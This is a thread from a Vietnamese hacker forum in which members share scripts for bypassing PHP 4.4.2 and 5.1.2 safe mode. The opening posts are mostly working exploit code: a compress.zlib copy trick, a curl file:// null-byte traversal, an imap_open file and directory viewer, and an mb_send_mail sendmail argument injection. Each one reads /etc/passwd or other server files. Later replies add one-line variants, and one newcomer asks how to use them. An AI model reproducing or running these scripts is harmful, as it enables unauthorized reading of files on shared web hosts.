banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass  XML
  [Announcement]   PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 07/09/2006 08:46:55 (+0700) | #1 | 21297
[Avatar]
baothu
Elite Member

[Minus]    0    [Plus]
Joined: 15/09/2003 02:42:15
Messages: 57
Offline
[Profile] [PM]
bài này có lâu rồi,nhưng thấy còn dùng được nên post lên đây cho mọi người tham khảo

Code:
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by Maksymilian Arciemowicz SecurityReason.Com
cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl
pozdro sp3x
*/


$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmpecho "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">SecurityReason.Com
Exploit</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. SecurityReason Team
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>
[Up] [Print Copy]
  [Question]   PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 07/09/2006 11:34:04 (+0700) | #2 | 21324
[Avatar]
baothu
Elite Member

[Minus]    0    [Plus]
Joined: 15/09/2003 02:42:15
Messages: 57
Offline
[Profile] [PM]
nữa nè,qua CURL
Code:
<?
$ch =
curl_init("file:///etc/passwd\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
[Up] [Print Copy]
  [Question]   PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 07/09/2006 11:35:43 (+0700) | #3 | 21325
[Avatar]
baothu
Elite Member

[Minus]    0    [Plus]
Joined: 15/09/2003 02:42:15
Messages: 57
Offline
[Profile] [PM]
Cái nè ByPass cũng cool nì,qua Imap Function
Code:
<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>

<?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

if ($string && $switch == "file") {
$stream = imap_open($string, "", "");
if ($stream == FALSE)
die("Can't open imap stream");

$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");

$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "<pre>";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]\n";
echo "</pre>";
imap_close($stream);
}
?>
[Up] [Print Copy]
  [Question]   PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 07/09/2006 11:37:46 (+0700) | #4 | 21327
[Avatar]
baothu
Elite Member

[Minus]    0    [Plus]
Joined: 15/09/2003 02:42:15
Messages: 57
Offline
[Profile] [PM]
Còn đây là mb_sendmail

<?php
$rek= "hehehehe";
if (file_exists($rek)) unlink($rek);
$file = "/etc/passwd";
$xploit = "-C ".$file." -X ".getcwd()."/".$rek;
mb_send_mail(NULL, NULL, NULL, NULL, $xploit);
echo "<pre>".file_get_contents($file)."</pre>";
?>
 
[Up] [Print Copy]
  [Question]   PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 07/09/2006 11:38:33 (+0700) | #5 | 21328
[Avatar]
baothu
Elite Member

[Minus]    0    [Plus]
Joined: 15/09/2003 02:42:15
Messages: 57
Offline
[Profile] [PM]
Init set,chưa test

1) Make the following script:
<?php
ini_set("session.save_path","/path/where/sess_foo/symlink/is/");
session_start();
$_SESSION['bar'] = "bar";
session_write_close();
?>
2) Call this script with ?PHPSESSID=foo
 
[Up] [Print Copy]
  [Question]   PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 02/12/2006 05:59:31 (+0700) | #6 | 27417
[Avatar]
Luke
Elite Member

[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
Thực ra ko cần dài dòng đến vậy
Khi có được 1 con shell chỉ cần
copy("compress.zlib://etc/passwd","<writeable>");

thế là đủ
[Up] [Print Copy]
  [Question]   Re: PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 02/12/2006 08:49:37 (+0700) | #7 | 27452
[Avatar]
hieuhoc
Member

[Minus]    0    [Plus]
Joined: 08/09/2006 21:57:39
Messages: 103
Offline
[Profile] [PM]
tks mấy bác nha mấy cái này hay đó để em test hết xem.
còn cái của anh Luke em mới thấy lần đâu để test luôn ko biết có bypass qua mọi trường hợp safe on không anh?
và cho em hỏi thêm nữa là liệu có cách nào local ở bluehost không ?
[Up] [Print Copy]
  [Question]   Re: PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 31/01/2007 11:50:22 (+0700) | #8 | 39169
[Avatar]
xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
He he tui có một cách giản đơn hơn cả luke

readfile("/etc/passwd");

Chấp cả Safe_mode vì đây là một hàm khá thông dụng trong việc đọc file nên ít server dám chặn nó
smilie
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Up] [Print Copy]
  [Question]   Re: PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 31/01/2007 13:33:48 (+0700) | #9 | 39193
[Avatar]
rickb
Reseacher

Joined: 27/01/2007 17:47:27
Messages: 200
Offline
[Profile] [PM] [Yahoo!]
Mình có 1 thấy mắc là hầu hết các cách trên toàn bypass safe_mod để xem (cat) 1 file nào đó nhưng khi local exploit thì phải dùng những lệnh kèm theo như ls .. để biết tên file/folder đó mà view chứ, nhưng nếu safe mod được bật thì ta ko thể ls được ngoài thư mục của ta, vậy là sao bypass safe_mod để thực hiện những lệnh như ls .. ?
[Up] [Print Copy]
  [Question]   Re: PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 01/02/2007 07:45:11 (+0700) | #10 | 39300
[Avatar]
~simon~
Member

[Minus]    0    [Plus]
Joined: 20/12/2006 15:46:42
Messages: 58
Location: nơi bắt đầu
Offline
[Profile] [PM]

hackernohat wrote:
He he tui có một cách giản đơn hơn cả luke

readfile("/etc/passwd");

Chấp cả Safe_mode vì đây là một hàm khá thông dụng trong việc đọc file nên ít server dám chặn nó
smilie  

vậy là pác chưa thấy quan tài rồi smilie nhiều srv dùng readfile thì cũng pó thôi
[Up] [Print Copy]
  [Question]   PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 10/05/2007 03:22:33 (+0700) | #11 | 58093
n00ne
Member

[Minus]    0    [Plus]
Joined: 08/05/2007 18:30:35
Messages: 50
Location: here
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN] [ICQ]
không cần ls đâu mà
hầu hết chỉ để view con /etc/paswd thui
còn ls làm chi
[Up] [Print Copy]
  [Question]   PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 02/06/2007 01:55:34 (+0700) | #12 | 62727
smile_sad
Member

[Minus]    0    [Plus]
Joined: 15/08/2006 19:15:08
Messages: 96
Offline
[Profile] [PM]

baothu wrote:
nữa nè,qua CURL
Code:
<?
$ch =
curl_init("file:///etc/passwd\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
 


Cậu có thể phân tích kĩ code này không? Tại sao lại dùng cái này thế:
Code:
curl_init("file:///etc/passwd\x00/../../../../../../../../../../../../".__FILE__);

mà không dùng cái này:
Code:
curl_init("file://etc/passwd\x00/../../../../../../../../../../../../".__FILE__);

và cái này :
Code:
curl_init("file:///etc/passwd/../../../../../../../../../../../../".__FILE__);


Giải thích cho mình rõ được không???
Ko hiểu lắm mặc dù đã đọc tài liệu.
[Up] [Print Copy]
  [Announcement]   Sử dụng code bypass PHP 06/01/2011 15:17:44 (+0700) | #13 | 228871
saphira
Member

[Minus]    0    [Plus]
Joined: 29/03/2008 15:27:36
Messages: 2
Offline
[Profile] [PM]
Mình là newbie! Mong các bạn hướng dẫn giúp! Mấy đoạn code mà mấy bạn up lên! Mình xài như thế nào?? Các bạn có thể hướng dẫn cho mình được không?
[Up] [Print Copy]
  [Announcement]   PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 06/01/2011 15:57:48 (+0700) | #14 | 228873
[Avatar]
xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
Cái này giải thích từng cái thì chẳng biết bao giờ mới xong

Đề hiểu được cần phải:

Biết lập trình bằng PHP
Search thông tin về các hàm trên tại http://php.net/manual/en/index.php
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|